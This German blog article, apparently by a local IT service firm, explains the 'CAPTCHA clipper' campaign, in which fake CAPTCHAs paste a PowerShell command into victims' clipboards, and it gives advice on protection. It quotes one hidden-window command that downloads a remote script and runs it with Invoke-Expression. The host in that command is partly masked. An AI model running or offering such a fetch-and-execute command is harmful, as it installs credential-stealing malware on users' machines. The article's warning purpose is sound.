Die dunkle Seite der CAPTCHAs
CAPTCHAs sind seit Jahrzehnten ein bewährtes Mittel, um Websites vor automatisierten Angriffen zu schützen. Sie verlangen vom Nutzer, bestimmte Bilder auszuwählen, Zeichen einzugeben oder einfach ein Häkchen zu setzen, um zu beweisen, dass sie keine Bots sind. Genau dieses Vertrauen in CAPTCHAs wird jetzt von Cyberkriminellen missbraucht, um ahnungslose Nutzer zur unbeabsichtigten Installation von Malware zu verleiten.
Eine besonders raffinierte Angriffskette wurde vom Conscia Security Operations Center (SOC) entdeckt und als „CAPTCHA clipper„ bezeichnet. Die Methode kombiniert Social Engineering mit technischer Manipulation, um Nutzer zur Ausführung schädlicher PowerShell-Befehle zu bringen.
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) sowie das Schweizerische Bundesamt für Cybersicherheit (BACS) warnen mittlerweile offiziell vor diesen Attacken.
Inhalt
Technische Analyse der CAPTCHA clipper-Angriffskette
Die Angriffsmethode nutzt mehrere Schritte, um den Schadcode auf den Systemen der Opfer auszuführen. Dabei wird eine Kombination aus JavaScript-Manipulation, PowerShell-Missbrauch und Command-and-Control (C2)-Kommunikation verwendet. Die folgenden Schritte beschreiben die technischen Hintergründe dieses raffinierten Angriffs.
1. Initiale Infektion: Das präparierte CAPTCHA
Der Angriff beginnt mit einer präparierten Webseite, die ein vermeintlich legitimes CAPTCHA enthält. Die technische Manipulation erfolgt über eingebettetes JavaScript, das eine bösartige Nutzlast vorbereitet.
Wie das bösartige CAPTCHA funktioniert:
- Nutzer stoßen auf eine gefälschte Website, die ein Cloudflare-ähnliches CAPTCHA anzeigt.
- Sobald das Häkchen bei „Ich bin kein Roboter“ gesetzt wird, wird unbemerkt ein PowerShell-Befehl in die Zwischenablage kopiert.
- Ein zweites Pop-up-Banner erscheint mit Anweisungen zur Tastatureingabe. Hier werden Nutzer dazu gebracht:
Win + Rzu drücken, um das Ausführen-Fenster zu öffnen.Strg + Vzu nutzen, um den schädlichen PowerShell-Befehl aus der Zwischenablage einzufügen.Enterzu drücken, wodurch der Befehl ohne das Wissen des Nutzers ausgeführt wird.
2. Der PowerShell-Angriff
Der kopierte PowerShell-Befehl ist darauf ausgelegt, Schadsoftware direkt aus dem Internet zu laden und auszuführen. Ein Beispiel für einen solchen Befehl nennt Consica im Blogartikel:
powershell -WindowStyle Hidden -Command “$rQd=‘https://xxxxxxxxxxxxx[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”Was passiert bei der Ausführung dieses Befehls?
- Die Datei
prizev2.txtwird von einem externen Server geladen. - Diese Datei enthält weitere verschlüsselte Schadcode-Befehle, die mit
Invoke-Expressiondirekt in der PowerShell ausgeführt werden. - Die Malware wird direkt im Speicher ausgeführt, um klassische Antiviren-Scanner zu umgehen.
- In vielen Fällen wird eine Backdoor geöffnet, um weitere Schadsoftware herunterzuladen.
3. Installation und Persistenz
Nach der initialen Infektion installiert sich die Malware, indem sie:
- Eine ZIP-Datei (
prize.zip) von einem externen Server herunterlädt. - Die enthaltene Datei
setup.exeinsAPPDATA-Verzeichnis extrahiert und automatisch startet. - Persistenzmechanismen nutzt, darunter:
- Eintrag in den Windows-Taskplaner, um sich nach jedem Neustart erneut auszuführen.
- Erstellung einer zusätzlichen Datei (
69HT8K.pif), die als Tarnung oder für weitere Angriffe genutzt wird.
Verwendete Techniken in der Übersicht
Die CAPTCHAclipper-Angriffskette setzt eine Vielzahl moderner Angriffstechniken ein:
| Technik | Erklärung |
|---|---|
| Social Engineering | Nutzer werden durch bekannte Sicherheitsmechanismen (CAPTCHA) in falscher Sicherheit gewogen und zu gefährlichen Handlungen verleitet. |
| Clipboard Hijacking | Schadcode wird unbemerkt in die Zwischenablage kopiert und durch Nutzer selbst eingefügt. |
| Fileless Malware | Schadcode wird direkt im Arbeitsspeicher ausgeführt, ohne Dateien auf der Festplatte zu hinterlassen. |
| PowerShell Exploitation | Die PowerShell wird als legitimes Windows-Werkzeug genutzt, um Befehle zu laden und auszuführen. |
| C2-Kommunikation | Die Malware baut eine Verbindung zu einem Angreifer-Server auf, um weitere Befehle zu empfangen. |
| Persistenz-Mechanismen | Automatischer Neustart durch den Taskplaner oder das Eintragen ins APPDATA-Verzeichnis. |
Wer steckt hinter den Angriffen?
Laut Conscia Security Operations Center (SOC) handelt es sich um einen erfahrenen Bedrohungsakteur, der gezielt Nutzer in Europa angreift. Die Hauptnutzlast wurde als eine Variante der LummaC2-Malware identifiziert, die darauf ausgelegt ist:
- Zugangsdaten aus Webbrowsern und Messenger-Apps zu stehlen.
- Kreditkarteninformationen abzugreifen.
- Befehle auszuführen, um weitere Schadsoftware zu installieren.
Ein genaues Attributionsmodell liegt noch nicht vor, jedoch weisen die Angriffe auf eine hochentwickelte Gruppe hin, die in der Lage ist, ihre Angriffsstrategien dynamisch anzupassen, um Sicherheitslösungen zu umgehen.
Wie kann man sich schützen?
Um sich vor dieser neuen Angriffsmethode zu schützen, sollten Nutzer folgende Maßnahmen ergreifen:
1. Sicherheitsbewusstes Verhalten
- Keine Tastenkombinationen auf unbekannten Webseiten ausführen!
- Falls nach einem CAPTCHA eine zusätzliche Anweisung erscheint, sofort den Browser schließen.
- Besondere Vorsicht bei Werbebannern oder Pop-ups, die eine Aktion verlangen.
2. Technische Schutzmaßnahmen
- PowerShell restriktiver konfigurieren, z. B. durch Gruppenrichtlinien (
Set-ExecutionPolicy Restricted). - Zwischenablage-Überwachung aktivieren, um unerwartete Inhalte zu blockieren.
- Nutzung eines modernen Virenschutzes mit heuristischer Analyse.
3. Was tun im Infektionsfall?
Sollte der Verdacht bestehen, dass der eigene Rechner infiziert wurde:
- Sofort das Gerät vom Netzwerk trennen.
- Alle Passwörter ändern, insbesondere für Online-Banking und E-Mail-Konten.
- Den Rechner neu aufsetzen, um sicherzustellen, dass keine versteckte Schadsoftware aktiv bleibt.
Laut dem BSI und dem BACS sollten betroffene Systeme vollständig gelöscht und neu installiert werden, da moderne Malware oft tief ins System eingreift und nicht ohne Weiteres entfernt werden kann.
Fazit: Ein Weckruf für IT-Sicherheit
Die CAPTCHAclipper-Angriffe zeigen, wie Cyberkriminelle zunehmend kreative Methoden nutzen, um Sicherheitsmaßnahmen in Angriffsvektoren zu verwandeln. Durch die geschickte Kombination aus technischen Exploits und psychologischer Manipulation gelingt es den Tätern, Nutzer unbemerkt in die Falle zu locken.
Besonders besorgniserregend ist, dass die genutzten Techniken leicht angepasst und wiederverwendet werden können. Auch wenn bereits einige Sicherheitslösungen die erkannten Indikatoren für Kompromittierung (IOCs) blockieren, werden neue Varianten entstehen.
Nutzer und Unternehmen müssen daher wachsam bleiben, ihre IT-Sicherheitsstrategien kontinuierlich aktualisieren und sich stets bewusst sein: Nicht jedes CAPTCHA ist harmlos.
Meroth IT-Service ist Ihr lokaler IT-Dienstleister in Frankfurt am Main für kleine Unternehmen, Selbstständige und Privatkunden
Kostenfreie Ersteinschätzung Ihres Anliegens?
Werbung
(**) UVP: Unverbindliche Preisempfehlung
Preise inkl. MwSt., zzgl. Versandkosten